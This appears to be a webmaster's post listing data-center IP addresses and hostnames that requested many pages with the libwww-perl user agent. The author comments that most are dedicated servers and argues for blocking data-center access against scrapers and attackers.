62.94.87.159 [159reverse.gestinweb.it.] requested 17 pages as "libwww-perl/5.805"
63.246.154.22 [ukrainehosting.info.] requested 6 pages as "libwww-perl/5.805"
63.247.138.144 [excalibur.rtsdns.net.] requested 48 pages as "libwww-perl/5.805"
64.191.28.101 [brick5.hostnoc.net.] requested 140 pages as "libwww-perl/5.805"
64.191.56.190 [cricket.sulteia.com.] requested 4 pages as "libwww-perl/5.805"
64.235.234.128 [gemini.lunarpages.com.] requested 186 pages as "libwww-perl/5.805"
64.34.161.52 [img.iuploads.com.] requested 80 pages as "libwww-perl/5.805"
64.38.11.6 [managed.voipbiz.us.] requested 1 pages as "libwww-perl/5.79"
64.38.24.138 [server1.caribehost.com.] requested 62 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 142 pages as "libwww-perl/5.801"
64.8.114.14 [web-06.ihservers.com.] requested 238 pages as "libwww-perl/5.801"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 773 pages as "libwww-perl/5.801"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 1188 pages as "libwww-perl/5.801"
64.8.124.64 [64-8-124-64.yourethehost.net.] requested 82 pages as "libwww-perl/5.801"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
65.42.183.2 [walrus.bytehead.com.] requested 300 pages as "libwww-perl/5.79"
65.99.196.23 [unknown] requested 89 pages as "libwww-perl/5.805"
66.103.152.111 [server22.internet-hosting-services.com.] requested 281 pages as "libwww-perl/5.805"
66.151.255.65 [server.by016.net.] requested 3 pages as "libwww-perl/5.805"
66.159.142.166 [66-159-142-166.adsl.snet.net.] requested 1 pages as "libwww-perl/5.803"
66.234.10.177 [ns7.digicc.net.] requested 49 pages as "libwww-perl/5.65"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
66.240.252.55 [su9325255.aspadmin.net.] requested 12 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 132 pages as "libwww-perl/5.803"
66.40.38.148 [host148.maxim.net.] requested 19 pages as "libwww-perl/5.65"
66.55.78.18 [66-55-78-18.yourhostingprovider.net.] requested 89 pages as "libwww-perl/5.801"
66.7.193.220 [interzone.shiftinteractive.net.] requested 170 pages as "libwww-perl/5.805"
66.70.121.80 [unknown] requested 96 pages as "libwww-perl/5.65"
67.159.26.45 [sanalsistem.net.] requested 7 pages as "libwww-perl/5.805"
67.159.26.99 [.] requested 62 pages as "libwww-perl/5.805"
67.18.16.82 [srv24.icx.pl.] requested 1 pages as "libwww-perl/5.805"
67.19.224.66 [lamda.asmallorange.com.] requested 84 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 433 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 227 pages as "libwww-perl/5.805"
67.19.85.196 [c4.55.1343.static.theplanet.com.] requested 343 pages as "libwww-perl/5.805"
68.179.54.20 [static-68-179-54-20.ptr.terago.ca.] requested 123 pages as "libwww-perl/5.65"
68.186.32.50 [68-186-32-50.static.scrm.ca.charter.com.] requested 61 pages as "libwww-perl/5.79"
69.10.142.59 [unknown.rackforce.com.] requested 187 pages as "libwww-perl/5.805"
69.13.6.170 [unknown] requested 136 pages as "libwww-perl/5.53"
69.26.178.210 [iota.sitelutions.com.] requested 304 pages as "libwww-perl/5.805"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 131 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
70.84.122.194 [web1.titansolutions.net.] requested 267 pages as "libwww-perl/5.805"
70.84.220.210 [d2.dc.5446.static.theplanet.com.] requested 518 pages as "libwww-perl/5.805"
70.85.247.250 [fa.f7.5546.static.theplanet.com.] requested 35 pages as "libwww-perl/5.805"
70.85.66.162 [wobbuffet-202.pokemonpalace.net.] requested 205 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 722 pages as "libwww-perl/5.65"
70.86.36.194 [titan.websiteactive.com.] requested 155 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.232.141.146 [146.141.232.72.reverse.layeredtech.com.] requested 54 pages as "libwww-perl/5.805"
72.232.178.114 [bullfrog.frogee.com.] requested 27 pages as "libwww-perl/5.805"
72.232.233.170 [g1.eth4.colo1.cust3.fuzionservers.com.] requested 171 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
72.29.66.235 [bravo.dnshttp.com.] requested 31 pages as "libwww-perl/5.805"
72.29.71.74 [ggs-t.ggs-t.com.] requested 31 pages as "libwww-perl/5.805"
72.29.74.43 [deso.surpasshosting.com.] requested 61 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 445 pages as "libwww-perl/5.805"
72.29.82.174 [pass57.dizinc.com.] requested 4 pages as "libwww-perl/5.805"
72.29.83.98 [jet33.hasweb.com.] requested 254 pages as "libwww-perl/5.805"
72.3.249.214 [ashopsoftware.com.] requested 50 pages as "libwww-perl/5.65"
72.35.81.67 [www70.privatelabeldns.com.] requested 235 pages as "libwww-perl/5.79"
72.36.156.123 [osd1.myhostcenter.com.] requested 98 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 149 pages as "libwww-perl/5.65"
72.51.34.179 [unknown] requested 11 pages as "libwww-perl/5.79"
72.51.35.81 [ssnakess.com.] requested 325 pages as "libwww-perl/5.805"
74.52.1.10 [buycheaperwebhosting.com.] requested 58 pages as "libwww-perl/5.805"
74.52.133.146 [92.85.344a.static.theplanet.com.] requested 115 pages as "libwww-perl/5.805"
74.52.208.138 [8a.d0.344a.static.theplanet.com.] requested 3 pages as "libwww-perl/5.805"
74.52.68.106 [theshire.caffeinepress.co.uk.] requested 213 pages as "libwww-perl/5.805"
74.52.84.138 [8a.54.344a.static.theplanet.com.] requested 16 pages as "libwww-perl/5.805"
76.169.115.66 [cpe-76-169-115-66.socal.res.rr.com.] requested 81 pages as "libwww-perl/5.65"
80.239.140.226 [megahost.pl.] requested 14 pages as "libwww-perl/5.803"
80.39.80.183 [183.Red-80-39-80.staticIP.rima-tde.net.] requested 12 pages as "libwww-perl/5.65"
80.77.86.243 [unknown] requested 104 pages as "libwww-perl/5.805"
81.169.186.195 [moncserver.de.] requested 557 pages as "libwww-perl/5.803"
81.181.15.6 [unknown] requested 96 pages as "libwww-perl/5.805"
81.181.89.42 [unknown] requested 208 pages as "libwww-perl/5.805"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 106 pages as "libwww-perl/5.803"
81.208.31.216 [81-208-31-216.ip.fastwebnet.it.] requested 8 pages as "libwww-perl/5.79"
82.165.231.16 [u15174557.onlinehome-server.com.] requested 122 pages as "libwww-perl/5.79"
82.165.27.174 [p15173001.pureserver.info.] requested 36 pages as "libwww-perl/5.76"
82.165.36.226 [russellgrantastrology.com.] requested 147 pages as "libwww-perl/5.65"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
83.15.63.115 [eih115.internetdsl.tpnet.pl.] requested 5 pages as "libwww-perl/5.803"
83.65.104.210 [83-65-104-210.klagenfurt-nord.xdsl-line.inode.at.] requested 55 pages as "libwww-perl/5.69"
85.214.19.18 [copyworld-kiel.de.] requested 294 pages as "libwww-perl/5.69"
85.25.134.185 [alpha961.server4you.de.] requested 23 pages as "libwww-perl/5.803"
87.236.194.104 [unassigned-87.236.194.104.coolhousing.net.] requested 55 pages as "libwww-perl/5.805"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
89.207.232.18 [unknown] requested 37 pages as "libwww-perl/5.79"
I haven't fully processed this list yet, but 17 of these IPs are in blocks assigned to theplanet.com.

The only thing I find most amusing here is we hear so much about compromised home computers being involved in botnets and this batch, for the most part, appears to be primarily dedicated servers in data centers.

This just verifies what I've been preaching about blocking access to your server from data centers as they are a source of many problems from scrapers to hackers.